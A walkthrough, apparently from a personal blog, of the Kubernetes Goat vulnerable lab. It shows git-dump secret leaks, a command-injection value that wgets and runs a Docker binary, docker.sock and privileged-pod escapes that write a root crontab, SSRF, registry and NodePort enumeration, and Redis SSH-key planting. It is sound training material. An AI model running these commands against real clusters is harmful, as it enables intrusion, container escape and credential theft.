Kubernetes Goat: A Vulnerable Kubernetes Playground

Sensitive keys in codebases

The text on the site reads:

Welcome to the build code service. This service is built using containers with CI/CD pipelines and a modern toolset such as Git, Docker, AWS, etc.

What we are given is a web service whose source code has leaked, and the code contains sensitive keys.

Brute-forcing directories with dirsearch confirms an exposed .git directory, which can then be dumped with the appropriate tool.
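A quick sketch of the enumeration (the URL and port here are hypothetical, taken from a local lab setup; adjust to your own):

$ dirsearch -u http://127.0.0.1:1230/

Hits on paths such as /.git/config confirm the repository is exposed.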

Download the source with git-dumper.
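A minimal sketch, assuming the same hypothetical URL as above; git-dumper takes the exposed .git URL and a local output directory:

$ pip install git-dumper
$ git-dumper http://127.0.0.1:1230/.git ./build-code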

One commit in the history touches some rather sensitive environment variables.
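For example, scanning the history (only the relevant commit is shown; the hash matches the checkout below):

$ cd build-code
$ git log --oneline
...
d7c173a Inlcuded custom environmental variables
...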

Check it out:

$ git checkout d7c173ad183c574109cd5c4c648ffe551755b576
Note: checking out 'd7c173ad183c574109cd5c4c648ffe551755b576'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

git checkout -b <new-branch-name>

HEAD is now at d7c173a... Inlcuded custom environmental variables

Compared with the current tree there is an extra hidden file, .env, which turns out to hold some AWS keys:

$ ls -a
. .. .env .git go.mod go.sum main.go README.md
$ cat .env
[build-code-aws]
aws_access_key_id = AKIVSHD6243H22G1KIDC
aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M
k8s_goat_flag = k8s-goat-51bc78332065561b0c99280f62510bcc

Get into the pod:

export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh

Run trufflehog . to analyze:

/app # trufflehog .
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:39:53
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: .env
Branch: origin/master
Commit: updated the endpoints and routes

@@ -0,0 +1,5 @@
+[build-code-aws]
+aws_access_key_id = AKIVSHD6243H22G1KIDC
+aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M
+k8s_goat_flag = k8s-goat-51bc78332065561b0c99280f62510bcc
+

~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:39:53
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: go.sum
Branch: origin/master
Commit: updated the endpoints and routes

@@ -1,496 +1,25 @@
-cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
......
......
......
......
......
......

The tool can be installed via pip:

pip install trufflehog

DIND (docker-in-docker) exploitation

This scenario is command injection, and after getting execution we notice that docker.sock has been mapped into the container.

/var/run/docker.sock is the Unix domain socket the Docker daemon listens on by default. If it is mounted into a container, we can talk to the Docker daemon from inside the container and run commands through it.
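For instance, anything that can reach the socket can drive the daemon over its HTTP API; a minimal sketch using the socket path from this scenario:

$ curl -s --unix-socket /custom/docker/docker.sock http://localhost/images/json

This calls the Docker Engine API's image-list endpoint, equivalent to docker images.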

We can exploit this by downloading the static Docker binary. The following lists the images present on the host:

127.0.0.1;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz && tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/ ;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

An actual attack would pull a designated backdoor image and run it with the host's root directory / mounted at /host inside the container, making it easy for the backdoor container to modify local files on the host (such as crontab) and complete the escape.
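A sketch of that escape, reusing the static binary and socket path from above (alpine stands in for the backdoor image, and the cron line is purely illustrative):

# run a container with the host's / mounted at /host, then append a root cron entry
/tmp/docker/docker -H unix:///custom/docker/docker.sock run --rm -v /:/host alpine \
    sh -c 'echo "* * * * * root id > /tmp/pwned 2>&1" >> /host/etc/crontab'

The host's cron daemon then executes the appended line as root every minute.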

The volume mapping is also visible in the scenario's configuration file.

SSRF in Kubernetes (K8S)

This is an internal API proxy on port 5000.

We notice something called metadata-db.

Digging deeper, we find http://metadata-db/latest/secrets/kubernetes-goat.
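Since the endpoint is also reachable on the flat cluster network, the same data can be fetched directly from any pod; a sketch:

$ curl http://metadata-db/latest/secrets/kubernetes-goat

The response carries the base64-encoded flag decoded below.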

Decode it:

echo "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d
k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab

Container escape to the host system

To accommodate more fine-grained privilege requirements, since version 2.2 the Linux kernel has been able to split superuser privileges into fine-grained units called capabilities. For example, the CAP_CHOWN capability allows a user to make arbitrary changes to a file's UID and GID, i.e. to run chown. Almost every superuser privilege has been broken out into an individual capability.

Inside Docker, capsh --print lists the capabilities:

root@nsfocus:/# capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

Compared with the output on a normal machine there is essentially no difference: this is root with the full set of capabilities.

The mount command shows a /host-system directory mounted.

The df command shows it as well, although from df alone we cannot be certain it is a mount.
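For example (outputs omitted here):

root@nsfocus:~# mount | grep host-system
root@nsfocus:~# df -h | grep host-system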

The name suggests it is the host's filesystem. Listing it, the host's entire root directory appears to be mapped in:

root@nsfocus:~# ls /host-system/
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv swap.img sys tmp usr var
root@nsfocus:~#

With chroot we gain execution on the host's filesystem:

root@nsfocus:~# chroot /host-system/ bash
root@nsfocus:/# ls
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv swap.img sys tmp usr var
root@nsfocus:/# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f0a9afd6f2b6 madhuakula/k8s-goat-info-app "python /app.py" 3 days ago Up 3 days k8s_info-app_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a93-a0a5dc762649_0
628fcee2fd49 madhuakula/k8s-goat-internal-api "docker-entrypoint.s…" 4 days ago Up 4 days k8s_internal-api_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a93-a0a5dc762649_0
df0495417aa4 registry.aliyuncs.com/google_containers/pause:3.4.1 "/pause" 4 days ago Up 4 days k8s_POD_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a93-a0a5dc762649_0
5702cc4cdd60 madhuakula/k8s-goat-system-monitor "gotty -w bash" 4 days ago Up 4 days k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942df3dc8_0
9c1ca7ec8f1a madhuakula/k8s-goat-poor-registry "/entrypoint.sh regi…" 4 days ago Up 4 days k8s_poor-registry_poor-registry-deployment-6746b95974-j9xrw_default_d4820b3b-48f0-4ebb-9657-c24d677c73cb_0
c8993f38a99d madhuakula/k8s-goat-home "/docker-entrypoint.…" 4 days ago Up 4 days k8s_kubernetes-goat-home_kubernetes-goat-home-deployment-757f96b7cd-tq5zh_default_ef99f1cd-b0ff-4d6a-9a2e-6443acba79ee_0
4a7f97587378 madhuakula/k8s-goat-hidden-in-layers "sh -c 'tail -f /dev…" 4 days ago Up 4 days k8s_hidden-in-layers_hidden-in-layers-lbwbn_default_2ab7372a-e434-4cae-8ede-beca97d662ab_0
......
......
......
......
......
......

We can also drive the cluster with kubectl (a kubeconfig has to be specified here):

root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/kubelet.conf get pods
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 4d4h
build-code-deployment-99d5f65db-hxllz 1/1 Running 0 4d4h
health-check-deployment-66c59d7f6f-qf5b7 1/1 Running 0 4d4h
hidden-in-layers-lbwbn 1/1 Running 0 4d4h
internal-proxy-deployment-5d99cbbdf7-wqmgr 2/2 Running 0 3d23h
kubernetes-goat-home-deployment-757f96b7cd-tq5zh 1/1 Running 0 4d4h
metadata-db-77987b74b-2tqjr 1/1 Running 0 4d4h
poor-registry-deployment-6746b95974-j9xrw 1/1 Running 0 4d4h
system-monitor-deployment-594c89b48f-97rs9 1/1 Running 0 4d4h
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/kubelet.conf get nodes
NAME STATUS ROLES AGE VERSION
k8s-master Ready control-plane,master 4d20h v1.21.13
nsfocus Ready <none> 4d20h v1.21.13

Looking at the deployment YAML, besides mounting the root directory at /host-system, the securityContext also sets allowPrivilegeEscalation: true and privileged: true. Both are very dangerous, comparable to Docker's --privileged flag.

root@k8s-master:~/kubernetes-goat/scenarios/system-monitor# cat deployment.yaml 
apiVersion: v1
kind: Secret
metadata:
  name: goatvault
type: Opaque
data:
  k8sgoatvaultkey: azhzLWdvYXQtY2QyZGEyNzIyNDU5MWRhMmI0OGVmODM4MjZhOGE2YzM=

---
apiVersion: apps/v1
kind: Deployment
......
      volumes:
        - name: host-filesystem
          hostPath:
            path: /
      containers:
        - name: system-monitor
          image: madhuakula/k8s-goat-system-monitor
          resources:
            limits:
              memory: "50Mi"
              cpu: "20m"
          securityContext:
            allowPrivilegeEscalation: true
            privileged: true
          ports:
            - containerPort: 8080
          volumeMounts:
            - name: host-filesystem
              mountPath: /host-system
......
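The same spec can also be pulled from the live cluster; a sketch (the deployment name is taken from the pod list above):

$ kubectl get deployment system-monitor-deployment -o yaml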

Docker CIS benchmark analysis

CIS, the Center for Internet Security, runs a security benchmarks program that provides well-defined, impartial, consensus-based industry best practices to help organizations assess and improve their security.

Docker Bench for Security is a script that checks dozens of common best practices for deploying Docker containers in production. GitHub: https://github.com/docker/docker-bench-security

First deploy the Docker CIS benchmark container:

kubectl apply -f scenarios/docker-bench-security/deployment.yaml

Enter the container:

kubectl exec -it docker-bench-security-XXXXX -- sh

Running docker-bench-security.sh in ~/docker-bench-security performs the checks.
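That is:

$ cd ~/docker-bench-security
$ sh docker-bench-security.sh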

Under the hood, scenarios/docker-bench-security/deployment.yaml simply maps a number of host directories into the container so the checks can run.

So we can just as well download the script from GitHub straight onto the host and run the checks there.
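Per the project README, roughly:

$ git clone https://github.com/docker/docker-bench-security.git
$ cd docker-bench-security
$ sudo sh docker-bench-security.sh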

Kubernetes CIS benchmark analysis

The previous scenario covered Docker; this one covers Kubernetes. GitHub: https://github.com/aquasecurity/kube-bench

Two commands deploy it:

kubectl apply -f scenarios/kube-bench-security/node-job.yaml

kubectl apply -f scenarios/kube-bench-security/master-job.yaml

Looking at the YAML, the two jobs run command: ["kube-bench", "node"] and command: ["kube-bench", "master"] respectively.

However, the command in the YAML on GitHub has since changed:

# https://github.com/aquasecurity/kube-bench/blob/main/job-master.yaml
command: ["kube-bench", "run", "--targets", "master"]
# https://github.com/aquasecurity/kube-bench/blob/main/job-node.yaml
command: ["kube-bench", "run", "--targets", "node"]

After applying, the job list gains a kube-bench-node entry:

root@k8s-master:~/kubernetes-goat# kubectl apply -f scenarios/kube-bench-security/node-job.yaml
job.batch/kube-bench-node created
root@k8s-master:~/kubernetes-goat# kubectl get jobs
NAME COMPLETIONS DURATION AGE
batch-check-job 1/1 36s 4d6h
hidden-in-layers 0/1 4d6h 4d6h
kube-bench-node 0/1 14s 14s

However, the pods end up in Error status:

root@k8s-master:~/kubernetes-goat# kubectl get pods
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 4d6h
build-code-deployment-99d5f65db-hxllz 1/1 Running 0 4d6h
docker-bench-security-dvlgz 1/1 Running 0 61m
health-check-deployment-66c59d7f6f-qf5b7 1/1 Running 0 4d6h
hidden-in-layers-lbwbn 1/1 Running 0 4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr 2/2 Running 0 4d1h
kube-bench-node-44mxv 0/1 Error 0 12m
kube-bench-node-8vf74 0/1 Error 0 10m
kube-bench-node-lfnmt 0/1 Error 0 8m10s
kube-bench-node-nmfn8 0/1 Error 0 10m
kube-bench-node-t67b8 0/1 Error 0 11m
kube-bench-node-xnlvw 0/1 Error 0 5m30s
kube-bench-node-zb54v 0/1 Error 0 9m30s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh 1/1 Running 0 4d6h
metadata-db-77987b74b-2tqjr 1/1 Running 0 4d6h
poor-registry-deployment-6746b95974-j9xrw 1/1 Running 0 4d6h
system-monitor-deployment-594c89b48f-97rs9 1/1 Running 0 4d6h

After updating the command I tried again:

root@k8s-master:~/kubernetes-goat# kubectl delete -f ./scenarios/kube-bench-security/node-job.yaml 
job.batch "kube-bench-node" deleted
root@k8s-master:~/kubernetes-goat# kubectl apply -f ./scenarios/kube-bench-security/node-job.yaml
job.batch/kube-bench-node created

Now it works, so stick with the latest manifests:

root@k8s-master:~/kubernetes-goat# kubectl get pods
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 4d6h
build-code-deployment-99d5f65db-hxllz 1/1 Running 0 4d6h
docker-bench-security-dvlgz 1/1 Running 0 63m
health-check-deployment-66c59d7f6f-qf5b7 1/1 Running 0 4d6h
hidden-in-layers-lbwbn 1/1 Running 0 4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr 2/2 Running 0 4d1h
kube-bench-node-8xndd 0/1 Completed 0 68s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh 1/1 Running 0 4d6h
metadata-db-77987b74b-2tqjr 1/1 Running 0 4d6h
poor-registry-deployment-6746b95974-j9xrw 1/1 Running 0 4d6h
system-monitor-deployment-594c89b48f-97rs9 1/1 Running 0 4d6h

The audit output can be read via logs:

kubectl logs -f kube-bench-XXX-xxxxx

Attacking private registry

Requesting /v2/_catalog returns all repositories:

$ curl http://192.168.2.174:1235/v2/_catalog
{"repositories":["madhuakula/k8s-goat-alpine","madhuakula/k8s-goat-users-repo"]}

Fetch the second image's manifest:

$ curl http://192.168.2.174:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest
{
   "schemaVersion": 1,
   "name": "madhuakula/k8s-goat-users-repo",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:536ef5475913f0235984eb7642226a99ff4a91fa474317faa45753e48e631bd0"
      },
......

It contains environment variable information.
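For a schema-1 manifest, the layer history (v1Compatibility) embeds each layer's image config, including ENV entries; a rough filter:

$ curl -s http://192.168.2.174:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest | grep -i env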

Exposing services with NodePort

NodePort opens a proxy port for a Service on every node in the cluster, allowing the Service to be reached from the host network.
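Assuming kubectl access, NodePort services are easy to spot; a sketch:

$ kubectl get svc --all-namespaces | grep NodePort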

This lab runs locally without public IPs, so there is no EXTERNAL-IP:

$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
k8s-master Ready control-plane,master 4d23h v1.21.13 192.168.2.174 <none> Ubuntu 20.04.2 LTS 5.4.0-72-generic docker://20.10.16
nsfocus Ready <none> 4d23h v1.21.13 192.168.2.172 <none> Ubuntu 20.04.2 LTS 5.4.0-72-generic docker://20.10.16

By default the NodePort range is 30000-32767; scan it with nmap. Here I just use the internal IP as the example:

$ nmap -T4 -p 30000-32767 192.168.2.172
Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-20 18:57 CST
Nmap scan report for 192.168.2.172
Host is up (0.0055s latency).
Not shown: 2767 closed ports
PORT STATE SERVICE
30003/tcp open amicon-fpsu-ra
MAC Address: 00:50:56:A2:18:00 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

Port 30003 is open:

$ curl http://192.168.2.172:30003/
{"info": "Refer to internal http://metadata-db for more information"}

Helm v2 tiller to PwN the cluster [deprecated]

This scenario has been removed from Kubernetes Goat, but it is still worth a look.

Helm is the package manager for deploying and managing applications on Kubernetes. Its default configuration and setup were insecure: if an attacker could access any pod and no network security policy (NSP) was in place, the attacker could gain full cluster access and take over cluster-admin privileges.

Start the environment:

kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash

By default, Helm v2 has a tiller component that holds full cluster-admin RBAC permissions.

I could not reproduce this part locally. The idea: by default kubectl get secrets -n kube-system is denied, but with the help of helm and the tiller service one can deploy pwnchart, which grants every default service account cluster-admin access, after which kubectl get secrets -n kube-system succeeds.
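For reference, the upstream write-up runs roughly the following from inside the pod (the pwnchart chart ships in the image; paths and names here follow that write-up and may differ):

$ helm --host tiller-deploy.kube-system:44134 version
$ helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart
$ kubectl get secrets -n kube-system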

Analysing crypto miner container

We usually pull images from public registries such as Docker Hub. An attacker can upload an image that runs a miner so that unsuspecting users mine on their behalf.

First list the jobs in the Kubernetes cluster:

$ kubectl get jobs -A
NAMESPACE NAME COMPLETIONS DURATION AGE
default batch-check-job 1/1 36s 5d5h
default hidden-in-layers 0/1 5d5h 5d5h
default kube-bench-node 1/1 29s 22h

kube-bench-node is the node baseline check from earlier.

Describe the job:

$ kubectl describe job batch-check-job
Name:           batch-check-job
Namespace:      default
Selector:       controller-uid=2ef52301-70c7-48f1-8df7-9319674f2ca7
Labels:         controller-uid=2ef52301-70c7-48f1-8df7-9319674f2ca7
                job-name=batch-check-job
Annotations:    <none>
Parallelism:    1
Completions:    1
Start Time:     Thu, 16 Jun 2022 10:53:35 +0800
Completed At:   Thu, 16 Jun 2022 10:54:11 +0800
Duration:       36s
Pods Statuses:  0 Running / 1 Succeeded / 0 Failed
Pod Template:
  Labels:  controller-uid=2ef52301-70c7-48f1-8df7-9319674f2ca7
           job-name=batch-check-job
  Containers:
   batch-check:
    Image:        madhuakula/k8s-goat-batch-check
    Port:         <none>
    Host Port:    <none>
    Environment:  <none>
    Mounts:       <none>
  Volumes:        <none>
Events:           <none>

Get the pods belonging to the job:

$ kubectl get pods --namespace default -l "job-name=batch-check-job"
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 5d5h

Dump the pod as YAML:

$ kubectl get pod batch-check-job-mrd2q -o yaml
apiVersion: v1
kind: Pod
metadata:
  creationTimestamp: "2022-06-16T02:53:35Z"
  generateName: batch-check-job-
  labels:
    controller-uid: 2ef52301-70c7-48f1-8df7-9319674f2ca7
    job-name: batch-check-job
  name: batch-check-job-mrd2q
  namespace: default
  ownerReferences:
  - apiVersion: batch/v1
    blockOwnerDeletion: true
    controller: true
    kind: Job
    name: batch-check-job
    uid: 2ef52301-70c7-48f1-8df7-9319674f2ca7
  resourceVersion: "72916"
  uid: 27657ad4-4fa9-48d0-bdd8-c131137ac3d2
spec:
  containers:
  - image: madhuakula/k8s-goat-batch-check
    imagePullPolicy: Always
    name: batch-check
    resources: {}
    terminationMessagePath: /dev/termination-log
    terminationMessagePolicy: File
    volumeMounts:
    - mountPath: /var/run/secrets/kubernetes.io/serviceaccount
      name: kube-api-access-pdfwk
      readOnly: true
  dnsPolicy: ClusterFirst
  enableServiceLinks: true
  nodeName: nsfocus
  preemptionPolicy: PreemptLowerPriority
  priority: 0
  restartPolicy: Never
  schedulerName: default-scheduler
  securityContext: {}
  serviceAccount: default
  serviceAccountName: default
  terminationGracePeriodSeconds: 30
  tolerations:
  - effect: NoExecute
    key: node.kubernetes.io/not-ready
    operator: Exists
    tolerationSeconds: 300
  - effect: NoExecute
    key: node.kubernetes.io/unreachable
    operator: Exists
    tolerationSeconds: 300
  volumes:
  - name: kube-api-access-pdfwk
    projected:
      defaultMode: 420
      sources:
      - serviceAccountToken:
          expirationSeconds: 3607
          path: token
      - configMap:
          items:
          - key: ca.crt
            path: ca.crt
          name: kube-root-ca.crt
      - downwardAPI:
          items:
          - fieldRef:
              apiVersion: v1
              fieldPath: metadata.namespace
            path: namespace
status:
  conditions:
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:53:35Z"
    reason: PodCompleted
    status: "True"
    type: Initialized
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:53:35Z"
    reason: PodCompleted
    status: "False"
    type: Ready
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:53:35Z"
    reason: PodCompleted
    status: "False"
    type: ContainersReady
  - lastProbeTime: null
    lastTransitionTime: "2022-06-16T02:53:35Z"
    status: "True"
    type: PodScheduled
  containerStatuses:
  - containerID: docker://3c724beda2e350f66c3e1845535a2b62f03f3678070ac6d290c39ee7462feb1f
    image: madhuakula/k8s-goat-batch-check:latest
    imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be381d47c086a0b74bbcdefa5f3ba0ebb78c8acbd2c07005346b5ff687658ef
    lastState: {}
    name: batch-check
    ready: false
    restartCount: 0
    started: false
    state:
      terminated:
        containerID: docker://3c724beda2e350f66c3e1845535a2b62f03f3678070ac6d290c39ee7462feb1f
        exitCode: 0
        finishedAt: "2022-06-16T02:54:11Z"
        reason: Completed
        startedAt: "2022-06-16T02:54:11Z"
  hostIP: 192.168.2.172
  phase: Succeeded
  podIP: 10.244.1.4
  podIPs:
  - ip: 10.244.1.4
  qosClass: BestEffort
  startTime: "2022-06-16T02:53:35Z"

batch-check-job uses the madhuakula/k8s-goat-batch-check image:

$ kubectl get pod batch-check-job-mrd2q -o yaml | grep image
  - image: madhuakula/k8s-goat-batch-check
    imagePullPolicy: Always
    image: madhuakula/k8s-goat-batch-check:latest
    imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be381d47c086a0b74bbcdefa5f3ba0ebb78c8acbd2c07005346b5ff687658ef

We can view the command each image layer ran with docker history; --no-trunc keeps the output from being truncated.
(This must be run on the node, since only the node has the image.)

$ docker history --no-trunc madhuakula/k8s-goat-batch-check
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:cb43bcb572b74468336c6854282c538e9ac7f2efc294aa3e49ce34fab7a275c7 5 weeks ago CMD ["ps" "auxx"] 0B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c apk add --no-cache htop curl ca-certificates && echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup && rm -rf /tmp/* # buildkit 2.96MB buildkit.dockerfile.v0
<missing> 5 weeks ago LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat 0B buildkit.dockerfile.v0
<missing> 2 months ago /bin/sh -c #(nop) CMD ["/bin/sh"] 0B
<missing> 2 months ago /bin/sh -c #(nop) ADD file:5d673d25da3a14ce1f6cf66e4c7fd4f4b85a3759a9d93efb3fd9ff852b5b56e4 in / 5.57MB

We can see this suspicious command being executed:

/bin/sh -c apk add --no-cache htop curl ca-certificates    && echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup     && rm -rf /tmp/*

Kubernetes namespaces bypass

Kubernetes has distinct namespaces, and the assumption when resources are deployed and managed in them is that they are isolated and cannot reach one another.

By default, Kubernetes uses a flat network architecture, meaning any pod or service in the cluster can talk to any other.

By default, namespaces within a cluster impose no network security restrictions: anything in one namespace can talk to the other namespaces.

Start the environment:

kubectl run --rm -it hacker-container --image=madhuakula/hacker-container -- sh

First edit /etc/zmap/blacklist.conf (vi /etc/zmap/blacklist.conf) and comment out the 10.0.0.0/8 line, otherwise the range cannot be scanned:

zmap -p 6379 10.0.0.0/8 -o results.csv
~ # ifconfig 
eth0 Link encap:Ethernet HWaddr 76:20:B2:1E:01:E8
inet addr:10.244.1.31 Bcast:10.244.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1
RX packets:2583424 errors:0 dropped:0 overruns:0 frame:0
TX packets:22995250 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:181718935 (173.2 MiB) TX bytes:1229657656 (1.1 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

~ # cat results.csv | grep 10.244
10.244.1.5
~ # redis-cli -h 10.244.1.5
10.244.1.5:6379> KEYS *
1) "SECRETSTUFF"
10.244.1.5:6379> GET SECRETSTUFF
"k8s-goat-a5a3e446faafa9d0514b3ff396ab8a40"

In the real world this is simply unauthenticated Redis access. If the Redis server runs as root, an attacker can write an SSH public key into root's account and then SSH straight into the victim server.
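The classic exploitation sketch (the key is illustrative; it assumes Redis runs as root and /root/.ssh exists and is writable):

$ redis-cli -h 10.244.1.5
10.244.1.5:6379> config set dir /root/.ssh
10.244.1.5:6379> config set dbfilename authorized_keys
10.244.1.5:6379> set payload "\n\nssh-rsa AAAA...attacker-key...\n\n"
10.244.1.5:6379> save

After the save, SSH to the host running Redis with the matching private key.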

Gathering environment information

The /proc/self/cgroup file reveals the Docker container's ID:

root@nsfocus:/home# cat /proc/self/cgroup  
12:blkio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
11:pids:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
10:rdma:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
9:devices:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
8:freezer:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
7:perf_event:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
6:cpuset:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
5:hugetlb:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
4:memory:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
3:net_cls,net_prio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
2:cpu,cpuacct:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
1:name=systemd:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
0::/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope

It can be matched with docker ps on the node:

$ docker ps -a | grep 5702
5702cc4cdd60 madhuakula/k8s-goat-system-monitor "gotty -w bash" 6 days ago Up 6 days k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942df3dc8_0

